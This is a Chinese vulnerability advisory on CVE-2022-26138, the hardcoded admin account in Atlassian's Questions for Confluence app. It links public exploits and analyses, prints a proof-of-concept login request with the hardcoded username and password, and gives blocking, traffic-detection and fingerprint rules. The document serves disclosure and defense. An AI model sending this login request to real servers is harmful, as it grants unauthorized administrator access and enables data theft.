一、漏洞通告:
https://avd.aliyun.com/detail?id=AVD-2022-26138
2022年7月20日,Atlassian 官方披露了CVE-2022-26138 Questions for Confluence 应用程序存在硬编码漏洞。当 Confluence 启用了 Questions for Confluence 应用程序后,会自动新增一个硬编码的管理员账号密码。攻击者可利用该硬编码账户登录进入Confluence系统,执行相关敏感操作,造成数据泄漏等。
二、漏洞EXP/POC:
https://github.com/1mxml/CVE-2022-26138
https://github.com/z92g/CVE-2022-26138
https://github.com/alcaparra/CVE-2022-26138
POST /dologin.action HTTP/1.1
Host: victim.local
Content-Type: application/x-www-form-urlencoded
os_username=disabledsystemuser&os_password=disabled1system1user6708&login=Log+in&os_destination=%2Fvulnerable.action
三、漏洞分析:
Atlassian Confluence硬编码漏洞(CVE-2022-26138)分析
作者:逆向云笔记
https://mp.weixin.qq.com/s/qAlsvN72QUu_V1i1yY_Yfw
CVE-2022-26138 Confluence 应用程序身份认证硬编码漏洞分析与复现
作者:且听安全
https://mp.weixin.qq.com/s/Ylk-PQwZBzRpLgSsYd8mCw
四、漏洞拦截:
POST请求+URL是"/dologin.action"+请求参数os_username=disabledsystemuser+请求参数os_password=disabled1system1user6708
五、攻击流量检测:
http流量中包含请求参数os_username=disabledsystemuser+请求参数os_password=disabled1system1user6708
六、应用指纹检测:
响应包包含:Atlassian Confluence和atlassian.com
原文始发于微信公众号(xiaozhu佩奇学安全):Confluence Questions For Confluence 硬编码漏洞(CVE-2022-26138)处置
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论